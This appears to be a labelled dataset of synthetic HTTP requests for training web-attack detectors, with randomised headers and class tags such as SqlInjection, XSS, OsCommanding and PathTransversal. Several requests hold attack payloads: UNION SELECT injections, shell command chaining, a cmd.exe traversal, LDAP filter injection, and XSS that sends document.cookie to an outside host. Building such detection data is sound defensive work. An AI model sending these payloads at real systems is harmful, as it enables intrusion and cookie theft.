Authorization: NTLM c2EyZWxnbmFvbGtsZmFrZWN1ZW1jYWVlZWVpcjBvTEFC
Range: -101,-0,2257-
Referer: http://Aye7p2.fr/nhbfh2e/udOonctr/dtaGehci/iejhbel/erRd.txt
TE: trailers,trailers
Trailer: User-Agent
User-Agent: boTsnxetto5Masqr
UA-CPU: Sparc
UA-Pixels: 516x4086
Via: HTTP/6.5 www.syguecyb.css, FTP/6.5 132.197.45.30
Transfer-Encoding: deflate
Upgrade: osanot/5.5
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48367
Start - Id: 35118
class: SqlInjection
PUT /ofedMpDQKY.U8fTuS/ee/locationLCHKFWRZupdate0-J/-AW.js? HTTP/1.1
Content-Length: 279
Content-Language: h4ur3n
Content-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
Host: 196.173.79.35
Connection: esaboyu
Accept: audio/*, text/*, video/*;q=0.6
Accept-Charset: *
Accept-Language: m7fepqeL-otti, r8-pdsih, 0id-zsidr;q=0.2
If-Range: Sat, 04 Aug 07 10:56:01 GMT
Referer: http://www.5te0thTh.com/ca9tss7a/slaaj.png
User-Agent: Mozilla/2.6 (compatible; MSIE 6.0; Win98; tjnosu; 6ruhnnxl; a1fxerg)
Via: HTTP/4.0 www.dheit.png, eeiL/6.0 34.161.68.174, 5.5 48.178.177.62:54260

childYnlZS=eapge1&aa4Mcf=227544&aoieilewxs5=t<:aautoexec 0&red=aFENFAT8bI&4ou3t1yecnc11je=s7q&de='&x6='    )  UNION    ALL  SELECT  52     FROM   7n6ss WHERE    (    ''=    '&se=lrzJppPOpz&yarRM=x7&aOa=02146312&aymDnbeni0t=m5iectsd&IDiotvhie7rvvi=lpnMWJQx7xXz

End - Id: 35118
Start - Id: 42202
class: SqlInjection
GET /nzUmBuLxG/ad@oA/UVscript4fusrP/sr/2ae/oapsGXmH/meCk/likeTGWkdtkEG.png?thritoefathf=fiFei&eooeoNhIlx8ntr=E8vT&8se=a5n&netcathome4Kgdivn=3PzIkz9&waenTdwoth=uese&DrXnph-=%27+union+++select+++%40%40version%2C1%2C1%2C1--&7gs=78080229&staate5o1=213&0copyzpM3v.=qnshutdownne%24andTeoufsx%3Damochaf HTTP/1.1
Host: www.rhtuAe.net
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: koi8-r, iso-8859-5;q=0.6
Accept-Encoding: compress;q=0.7, identity
Accept-Language: *
Cache-Control: min-fresh=204
Client-ip: 162.203.183.241
Cookie: hfjT=29;KzFQ7dLH=iydrop;bow=)|Werlt emn2m8is<tgroup by;bid2Stfennn=00
Cookie2: $Version="304"
Date: Sun, 27 Jun 04 10:04:44 CET
ETag: W/"fn7bj1SqWuSxNn3lC"
Expect: 100-continue
From: nsteretf@trtl.de
If-Modified-Since: Thu, 25 Mar 10 05:07:50 CET
If-Unmodified-Since: Wed, 05 Aug 09 23:33:05 GMT
If-Match: *
If-None-Match: "qB_XvF9v028UTkyxT"
If-Range: "S4CAoY12fDOSu3Ve6DMj"
Max-Forwards: 7
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: eewl hlzcoi=4weu
Range: 8473-303,-227666,770360-
Referer: /no34uji.gif
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: User-Agent
User-Agent: ecIP-nj http://www.Itse9.uk
UA-CPU: StrongARM
UA-Disp: 764,0830,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 124x5537
Via: 4.6 126.11.149.103, qonc/4.8 www.lLv4sa.tiff
Transfer-Encoding: gzip
Upgrade: srir/8.4
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 174.56.222.47
X-Serial-Number: 646981931152
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42202
Start - Id: 49164
class: XPathInjection
GET /bn29t/tCoL-MT9c-0IdkaM0Ak/arQT/eA7Xr@tbyo2/lAkidbu/eres6sdeneueFanilik/eAT9y.swf?tkhal=fj%2Finhwr%2FxaxO%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D082%5D+or+++%27nwahoho%27++%3D+%27&uaraNoat=ieehsRncgfes8msna HTTP/1.0
Host: www.R8wj.ch:80
Connection: drlaBre
Accept: text/plain;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=693
Client-ip: 38.175.250.11
Cookie: oehS=neTchIntcaixartmy;2dnhteeee6Yrp=0;w2et= eat
Cookie2: $Version="03"
Date: Sun, 08 Feb 04 03:21:57 UTC
ETag: "CXlJzMWgpePUm-c"
Expect: 100-continue
From: esgt1xrh@tidc.com
If-Modified-Since: Mon, 09 Feb 09 05:34:14 CET
If-Unmodified-Since: Fri, 23 Jan 04 18:43:07 GMT
If-Match: "cgafRtAw@PKITwmwIPCU"
If-None-Match: *
If-Range: Wed, 16 May 07 15:04:46 GMT
Max-Forwards: 8861
MIME-Version: 5.8
Pragma: yEweamfG='67'
Proxy-Authorization: Digest response="D8e20478C93A7Ab8Ac2895c940EBEbcd"
Authorization: ptad c8aietA=roddisd
Range: -441207,31726-,-3
Referer: /yeWit325.gz
TE: trailers,trailers,deflate;q=0.6
Trailer: If-Range
User-Agent: rmnZorfRV http://www.rtnzii.fr
UA-CPU: StrongARM
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 290x3654
Via: yep/2.4 www.Zum9eyS2.tiff, HTTP/0.8 www.wcsrrr.shtml:122, Aesas8/3.7 www.t2vle.html
Transfer-Encoding: gzip
Upgrade: rMm/8.7
Warning: 291 113.152.215.252 "6unhh" "Fri, 21 Oct 05 09:21:56 GMT"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 017399203750342
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49164
Start - Id: 43414
class: OsCommanding
GET /Tsaspn3nosrce9oI/zDK7-I/ootmeFosoxl/rex/topthbin4_gpv5Nj/lNgrpes2ws0Srnl.dll?ntenbt=%3Cr&htkdgtao9=053&atge=faaDeuzn&6esttndfianbuq=cvwpMRinbc&mtrahaiaoi9l=5468890050&saoiboienoeqdUn=0&KjLGZp=xHu96seAesTerwcg0&zNIaoreogbdmdt=smiuoalqoabsuoh&ym4yEs5dpmy6am7=2487&h-Oj.eQUY0dr=%27++%3B+cat+%2Ftmp%2Fresmail++in%40cholantr.com++++%3B&CRo9=like4eeo HTTP/1.0
Host: www.2kUoroasm.uk
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-icelandic;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 5.203.243.165
Cookie: rmso=ndoectrsnih;nasd=9omoousar5on;iedpchemhiasT=047973341;5rdcsaw4=zp
Cookie2: $Version="4"
Date: Wed, 18 Aug 04 24:26:21 UTC
ETag: "jIrF8GB@jiqHJsgpERvI"
Expect: 100-continue
From: eM8p@ehnasbf.it
If-Modified-Since: Sat, 01 Nov 08 02:54:08 CET
If-Unmodified-Since: Tue, 08 Jan 08 21:33:18 GMT
If-Match: *
If-None-Match: "_@yRQJp3P-8C4N73cHhN"
If-Range: *
Max-Forwards: 9063
MIME-Version: 4.8
Pragma: nronts5=bvrhsdH
Proxy-Authorization: NTLM RDdvbGF0YXBoaGNvaTFyYW5kZWRSc3NtSnMyc2luaHRNc2doZWVtZmE5ZTk=
Authorization: Digest qop=auth
Range: 6-,47-768842,6146-09
Referer: http://www.Mtsanhy.it/Aewom/IjEft/7fs1i8Lo/nrsia0et.tiff
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/9.9 (Windows; U; Win98 3.7; 4a-zg; rv:8.9.1) Gecko/01637667
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 319x516
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: identity
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 193.68.229.100
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43414
Start - Id: 46879
class: XSS
POST /rrFsmnalT/eeo/amZneSshatnurzrgE/aFa3Tod7SrCKPbausnF/ze/1wUZv3dvEB/dn9o@E/pt/s2gI8qbq/wiLre67cantdAjetbeO/fs7/mIPkqTGT9DYiUBr.asp? HTTP/1.0
Content-Length: 475
Content-Language: 2knsnwe
Content-Encoding: identity
Content-Location: /lur0rsey/e24bs/hxwjOar.swf
Content-MD5: M3ZkaGZTY3R0ZWVlaGhseQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Nov 06 10:27:09 UTC
Last-Modified: Mon, 25 Sep 06 14:12:26 GMT
Host: 185.253.200.236
Connection: keep-alive
Accept: */*
Accept-Charset: euc-cn, iso-8859-3, x-mac-turkish;q=0.6, windows-874
Accept-Encoding: 
Accept-Language: tiety-cdo;q=0.9, c-rne, abtyha-8ahpufsi;q=0.4, iasHee-zjhaa, s-qoDais
Cache-Control: no-transform
Client-ip: 89.81.27.19
Cookie: P8eslanoeg=sebWNaarth
Cookie2: $Version="8"
Date: Tue, 06 Jun 06 14:08:15 UTC
ETag: W/"Ytpi4lc@4IweqAb"
Expect: eimHsos=aoe09mew;tEeut=cmfm
From: xorersew@0i1thu.fr
If-Modified-Since: Tue, 14 Sep 04 02:11:12 CET
If-Unmodified-Since: Sat, 03 Apr 04 02:59:33 UTC
If-Match: *
If-None-Match: "cB3ebdaEj-Wo8XLHUN"
If-Range: *
Max-Forwards: 840
MIME-Version: 8.9
Pragma: ngfks9='mlj'
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Digest qop=auth
Range: -692,548156-61437,-79
Referer: /5aeaoio/sgtcone/2a7t/9eetG0/iediIes.mpg
TE: trailers,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: booreneoa (a@H_L3Wo; i-43fr@; dCUnVuP; ckCKY3UjZ; nFQchB_)
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: 1.2 www.daOrgscw.tiff:2, s4iyo/1.3 249.164.153.118, 0.1 41.12.15.67
Transfer-Encoding: compress
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 479 70.40.194.240 "olAdtnTro" "Wed, 14 Apr 10 22:00:41 UTC"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mmai0t9lyteria=aniuin&yhvdpe=agnetcatcmetaOmOyH&6uC=02596410&heh0szw=oLPRIx4&rmdYex-dsN3=riFjczOWnuQ&u4yn1nareb7=aTsesu<r|obst&0ShtaccesformBag=fae&Ekeond=<div    style=    "  width: expression([document.location.replace  ('http://www.titelini.com/cgi-bin/iterarnt.cgi'+document.cookie);]);">&yavdo=i4 yl34eee&efomSph=[execg&reeads= ?shbv[binh03e|sformge&axd=ookcG6mjo-5&rdtbreE3=4963368467&l6RXx@E@V=aoRteeysseoyIhwdxr

End - Id: 46879
Start - Id: 49567
class: XPathInjection
GET /1htpassqpassthruMl/eK4.jpeg?nessuisds=hdmpand&cibdi=8940+++++or++++bIknsn%2FsE9uda%2Ftt%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D62%5D+or++78%3D HTTP/1.0
Host: 231.155.76.238
Connection: 4ghcrgi
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: vTKy-w, am-dtr;q=0.0, vdrco2ii-uyctCr
Cache-Control: no-transform
Client-ip: 229.72.228.0
Cookie: NshutdownZhP=8562;Fttr6eh1wlw2iI=991065
Cookie2: $Version="6"
Date: Tue, 20 Feb 07 09:21:38 GMT
ETag: "o8Q5JZA-RMdUwYv_Q8Ru"
Expect: rai8lT=iouvqGee;fouiTcye=n37l
From: rZ7t1wz@obusg.st
If-Modified-Since: Sat, 03 May 08 01:40:51 GMT
If-Unmodified-Since: Tue, 31 Mar 09 16:49:31 UTC
If-Match: "lMf3_lfv-awJc@89w@"
If-None-Match: *
If-Range: Mon, 05 Jan 04 14:01:51 GMT
Max-Forwards: 045
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: eeftuo sfagt=srres
Authorization: Digest realm
Range: -351866,-996363,00-
Referer: http://www.3rtodti.cz/7bfrsrrr/raiw0e/oiwt/gshs.mdb
TE: trailers
Trailer: Range
User-Agent: 7ooatur (1ocsooSVQ; ts7-zqq5; sNBWi0KVR; 1IPuAa-9OU; vXOkpjM)
UA-CPU: Sparc
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9192x115
Via: eso/3.0 154.226.69.16, HTTP/8.8 www.ypltEa.jpeg
Transfer-Encoding: 0bec; yErt=8T3mApj
Upgrade: opGee/0.6, iij/9.1, thIez/8.7
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 4750592519886658439
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49567
Start - Id: 47157
class: XSS
GET /httpTdocumentB@m8C1lJautoexec/n@6.4z3sRujdL4SfBz/NRYeZtQ@aD/lebja/tt1tnt/cnfgtnntalgehli/isooiaam6e.php4?tnSa89=a%7EenchildhHpsa&uadsnnqafslach=ynra+nrceh%40n&1e6ttetpeehyw=53125&38creaee=sf-xrj&tB8ze2=91244&estnyctre=8345622&la=ijyG&4phudfoiala=%3Cimg++src+++%3D++%22mocha%3A%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.se.com%2Fcgi-bin%2Fnengarni.cgi%27%2Bdocument.cookie%29%3B%5D++++%22+%3E&UvbscriptI7zsAxaB=esock_streamh&3dasrag=69&q7D5bB0EJo99=u9dB4jn&e3wsrvncjehtZg=u8ToDOwMTZKE&cahnztqeit7e6n=epasswd&arebD26treetti=etlndoropit HTTP/1.1
Host: 94.75.255.219
Connection: close
Accept: text/*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, identity;q=0.9, deflate;q=0.2, compress;q=0.6, gzip
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 35.253.169.121
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="225"
Date: Fri, 27 Jan 06 18:34:27 UTC
ETag: W/"0zXn4F-uIX@DtGV_"
Expect: ssietn1a
From: v1syist@Ntei5rra.com
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Thu, 22 Nov 07 16:20:04 GMT
If-Match: *
If-None-Match: "fg1D@u5do8NGQxV5A"
If-Range: Mon, 17 Oct 05 16:17:25 UTC
Max-Forwards: 6
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: Basic aWllbmlnbTpjZW90
Range: -016,1-,67332-47295
Referer: http://haiel.com/rniaue/eult/NrdRiev.js
TE: gzip;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.6 (Windows; U; Win 9x 6.0; mo-p8; rv:6.8.6) Gecko/80145009
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/1.8 69.67.233.218:7
Transfer-Encoding: deflate
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 416 17.78.108.145 "hieN9" 
X-Forwarded-For: 36.159.65.174
X-Serial-Number: 02973768667711464
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47157
Start - Id: 44051
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 6.16.225.242
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: fxor7r-r3N0;q=0.1, ttdfxe-t6enre, 2aa-cwyr5eg, Si-ih, k-sl;q=0.7
Cache-Control: no-transform
Client-ip: 11.19.174.55
Cookie: vFqw9bhtpassdCo=vfH(;x6zu9=2;zhomeG.xterm9.p=: J
Cookie2: $Version="0"
Date: Wed, 26 Dec 07 23:06:31 CET
ETag: "KHyP8aOEWUQj0XgwGKg-"
Expect: 100-continue
From: 2eEemxwf@fedDctiae.gov
If-Modified-Since: Thu, 06 Jan 05 22:06:07 CET
If-Unmodified-Since: Tue, 27 Jan 04 20:34:39 UTC
If-Match: *
If-None-Match: "c3YryAjjM.ugyelYJ9"
If-Range: Fri, 19 Nov 04 23:56:07 GMT
Max-Forwards: 500
MIME-Version: 2.6
Pragma: eRu='ln'
Proxy-Authorization: Digest response="fEbfBB7c0E29b479e09d8FeF2679E7e3"
Authorization: demilg fkza=h4aLh
Range: -0
Referer: http://www.mnhhfs.st/eamyt/retn.msf
TE: trailers,chunked
Trailer: Authorization
User-Agent: Mozilla/8.8 (Windows; U; Win98 7.1; aD-et; rv:5.6.0) Gecko/11484842
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4959x090
Via: deaoxc/4.0 29.20.165.153:913
Transfer-Encoding: 8ehus
Upgrade: tpnTf/6.7, GatRth/6.1, eyss8u/8.0
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44051
Start - Id: 35245
class: SqlInjection
GET /ecfi3to/eeotlyzraJ/9wolILNgki8os2X-A-Fm/6r2esiuckFtx4deRnh.tiff?l87i1=aDetdtl6eTe&o4Ieodehiqe=%3B++exec++++get_cust%28+%27x%27%27++++union+++select++object_name%2Cobject_type%2C%27%27x%27%27+++from+++++user_objects+where++%27%274iaoanndin%27%27++++%3D+++%27%27+++%27++%29%3B&dk=ue3jenhh&repbCng9enehi1=520&orw4k=op+ev+Egcd&KFOphpV=659150&ivjwoeougrea=5 HTTP/1.0
Host: 176.222.0.218
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.6, deflate, compress, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 150.203.233.233
Cookie: irhwhsou7x=eVnkl;anwsns=s4e;rwougk4Fiie=diia;MsgP=f 3group byc7zxfn7itee:s;swh8ht=28760;2o=nes
Cookie2: $Version="9"
Date: Mon, 28 Jan 08 16:52:08 GMT
ETag: W/"jqRyTt_G6V.5opQIoq5"
Expect: 100-continue
From: eanchR@cq4m.gov
If-Modified-Since: Wed, 28 Sep 05 15:25:05 UTC
If-Unmodified-Since: Wed, 23 Nov 05 10:52:52 GMT
If-Match: "o64x6zlvVa_jB03.F"
If-None-Match: "Sl6Hd0k_r0nWJP42AJV@"
If-Range: *
Max-Forwards: 1348
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: ToOTga enrid2e=Virrre
Range: 686-87074
Referer: http://luaritt6.ch/aaeha/chnieywo/euac/fexrNond/ntes.asp
TE: gzip;q=0.1,deflate;q=0.7,trailers
Trailer: Warning
User-Agent: isadgi (u.kl4Xg.; dTk2X@CLO; tL.Xd0)
UA-CPU: 68000
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7374x0863
Via: HTTP/6.6 176.196.141.171, HTTP/3.7 153.192.207.115
Transfer-Encoding: yfqcxb; eikstlig=nie7
Upgrade: rtrrq0/4.2, nltst/2.4, Sic/2.9, oaewts/4.5
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 99658845770
----: --------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35245
Start - Id: 44930
class: PathTransversal
GET /nW9sBku/_P1rUWQvusock_streamVxXA/nnuoeswOrlqebeaitewm/yreioc/eatjAsE5muualrcpns/adhHsnagtoEdt4/in/imgE/oS-3Kp.msf?Fi=ehonitgkdae&BmtasieAnlbn98r=h5n&Z4hl9eTC=4334290&ntyssyeoah9msi=aa&t9eneoh=6yLica&dOalthkre6=23102534&loap=.%2F..%2F.%2F..%2F&vtntpec=097&4tEaCuskn=++e+esaexecLab+e2%5Ba&li=11075&hmithts8=rAZ7 HTTP/1.0
Host: 98.51.151.99:14
Connection: keep-alive
Accept: application/*;q=0.0, video/mpeg;q=0.1, text/html
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 210.224.126.37
Cookie: wtT=9;eieNtet=it~ko;rezsei8b=ntht3airMmo;EADNCVkqFoSz=sqfbin;yoru3ew3yA=fwIqei7
Cookie2: $Version="4"
Date: Sun, 16 Sep 07 19:06:19 UTC
ETag: W/"XLxzFuV8SXEFv.mqCY"
Expect: laocgTl
From: ereoihlc@a3nrtr.gov
If-Modified-Since: Sat, 31 Jan 09 13:43:20 GMT
If-Unmodified-Since: Sat, 27 Jun 09 17:14:53 GMT
If-Match: "bYmRxm3JoHIIpH8Cv3"
If-None-Match: "uZHmAw@nZQC3NgWr"
If-Range: Mon, 26 Nov 07 05:59:30 GMT
Max-Forwards: 7324
MIME-Version: 7.1
Pragma: 3iys5e='4jtl5'
Proxy-Authorization: Digest response="98F2FadAed0C8DFfeDEa1A54Dbbba32e"
Authorization: NTLM dGFlZWVIYmplZXJuZW9ob25lZHRlb3JoaXRydXdvQTdhdGFXMXRuaW5qYVM=
Range: -044,-5960,-6
Referer: http://www.adeolSa.st/e7au/rgte/rIm6idH/4vlRhsr6.css
TE: chunked;q=0.4,gzip;q=0.0,gzip
Trailer: Cache-Control
User-Agent: Mozilla/8.4 (Windows; U; Win98 6.7; ux-an; rv:9.7.1) Gecko/38066951
UA-CPU: StrongARM
UA-Disp: 8119,252,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: 8.6 105.224.30.148, HTTP/4.5 www.8baht6e.html, sti/8.9 www.0Emi.css:396
Transfer-Encoding: compress
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 627 www.luad.js "7atl" "Sun, 01 Jul 07 05:55:47 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44930
Start - Id: 42622
class: SqlInjection
GET /1Og8Tz3yq2xBi@Tyg/iaRBt/ieaectrS.gif?dbRagrwd=hXmyYeRSr&oirh9cner=8&dlum=OR+++++%270sl%27++BETWEEN+%27R%27+AND++++%27T%27&bdp=d13+naapl0 HTTP/1.0
Host: 20.235.102.45:189
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.9
Cache-Control: max-age=46
Client-ip: 59.30.97.76
Cookie: wQTx9gl7=0sg&eoe =vdoeh0Udiv0;-dXwp-c8FEE=1n6s0Lg;al5e= twli
Cookie2: $Version="50"
Date: Mon, 11 Apr 05 10:39:54 GMT
ETag: W/"FXXTyG49LAn3eWm@Zb"
Expect: 100-continue
From: auoiBfre@itih.st
If-Modified-Since: Tue, 22 Jul 08 06:16:47 UTC
If-Unmodified-Since: Fri, 23 Jan 04 21:56:38 GMT
If-Match: *
If-None-Match: "9@Zt5nxi1e2a7U7wGUw8"
If-Range: "k_s3mn@WlgTRkLRoAi_"
Max-Forwards: 21
MIME-Version: 0.0
Pragma: nx='q'
Proxy-Authorization: Saen 6ahrcn=dstav
Authorization: ayhmi3 v0E7E=cnmi
Range: 72326-9838
Referer: http://Nuno.ch/cci9.cfm
TE: deflate;q=0.6,chunked;q=0.1
Trailer: Cache-Control
User-Agent: abwtAnRndt (tOnKqRRh; tBlZurerq; rNwg1iJddf; awehByV7S)
UA-CPU: x86
UA-Disp: 4133,8176,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4720x346
Via: HTTP/9.2 www.Enistre.shtml, jth/5.6 www.03mp.png, 1.6 www.wiu0n.gif
Transfer-Encoding: identity
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 8496085011716773
----: ------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 42622
Start - Id: 37260
class: LdapInjection
GET /FpedfneeIooadnh0d/CyL4imgB/tjutbna4tqcto/i6olib7nm_XFpasswdf/rhsnonisb5e2eihtwn/r6/kYoydFsAwd/nB0sQ12ezXXL-ML2/o0b2mcS-oZbO.wpa2pm/r7yD8Vh0BVlXOkK4t.php4?rsreN1tuknsORi=6243&roy5ycisreeds=jRnnnbted3nrt&euoelr7iyn=81864659&phitmiBta=2833&oqn2=ftpeciw%3DAone1ercp&crmzdBaccess_logMC=niupl%29%28%26%28objectClass%3D++++tc*%29&nhB6mt=n%3C&8srtntl8r=3881444259&ouHl=locatttchtmpusemdns&6drcr0l43ehe=634252 HTTP/1.0
Host: www.otSlsh.biz
Connection: tae6itt
Accept: video/mpeg, video/*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=2585
Client-ip: 33.58.126.148
Cookie: ameiir=95799;cj=35yynhrn;2esrolep2pp=e9zdJ1i5+evs
Cookie2: $Version="99"
Date: Mon, 21 Mar 05 07:02:50 GMT
ETag: W/"bNc0uNmABEHOP3zCY98w"
Expect: nrsrt=lsau
From: tlclo@pOIec.be
If-Modified-Since: Thu, 07 Oct 04 12:39:52 CET
If-Unmodified-Since: Wed, 02 Mar 05 05:48:51 UTC
If-Match: "m.IF4yiwMxD1hRBZB"
If-None-Match: "gwZyOtSvC-@O4eI8"
If-Range: *
Max-Forwards: 65
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: oetuts 0iernty=iio4tep
Authorization: NTLM b21oZWVlYWN1c3NleGhnd3Vzc29sYm9paHN0bGV0ZXRzMnRsZTZuaHNsYXRp
Range: 690936-,5769-,6-
Referer: /hsgWea/aalzutL3/nbsrea.dll
TE: gzip;q=0.6,chunked;q=0.1,chunked;q=0.4
Trailer: Referer
User-Agent: Mozilla/4.2 (Machintosh; U; PPC Mac OS X 3.3; sl-l6; rv:2.6.1) Gecko/38511508
UA-CPU: 68000
UA-Disp: 785,4501,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1371x144
Via: FTP/8.4 116.93.217.116
Transfer-Encoding: gzip
Upgrade: htlt/0.4
Warning: 942 43.44.236.191:46 "btf9mwO" "Mon, 04 Sep 06 14:47:25 CET"
X-Serial-Number: 4915309492060646563
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37260
Start - Id: 39548
class: SSI
PUT /6e/eoql/eetd4dtamhi/t8Faomoctd/wsleaedoQrlh/e58T6MpDt5/nn3hontcc/ed05sNfuQbdocumentK8/iCO33coAiFKOP2rR/ctxeraevun3eodedfeb/tt59yoxa7oteHieo.bin? HTTP/1.1
Content-Length: 257
Content-Language: aea,ssihioh,aslme
Content-Encoding: compress
Content-Location: http://www.3itgu.org/hleairo/casf/ftack.pl
Content-MD5: dmlldGdnYjFvdGhhZWlzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Jul 09 09:52:06 UTC
Last-Modified: Thu, 21 Sep 06 14:17:28 GMT
Host: www.btna5aregp.fr
Connection: keep-alive
Accept: image/gif
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, identity, deflate;q=0.1, compress;q=0.7, identity;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 94.165.84.44
Cookie: ZreplacemwuN=s-ly_;fsaanleipge0=agwrjdrvFstfOltp
Cookie2: $Version="6"
Date: Fri, 30 Nov 07 09:01:38 GMT
ETag: "jH5nNBEG4Q3ydGqFcPDi"
Expect: 100-continue
From: resjr@ovdSf3ie7i.biz
If-Modified-Since: Thu, 28 Jul 05 18:18:03 CET
If-Unmodified-Since: Tue, 28 Dec 04 19:24:25 CET
If-Match: *
If-None-Match: *
If-Range: "3Z7-3ynm7.5r@1hq"
Max-Forwards: 37
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: tennta dsi10Hd=atah9ert
Authorization: rfejui tecolboq=iNrss8tl
Referer: http://www.eomaNas.st/fueT.zip
TE: trailers
Trailer: Proxy-Authorization
User-Agent: 9ed4fn (gszm_RljgF; tD2YE656)
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color32
Via: FTP/7.1 94.79.90.11:60453, 3.6 www.t3uTwn.png:87, HTTP/3.8 40.112.111.113
Transfer-Encoding: deflate
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 538 www.8nsfo.jpg "eTpenvt3cmheHz" "Sun, 09 Nov 08 07:42:25 CET"
X-Serial-Number: 11507528452920010282
----: --------------------
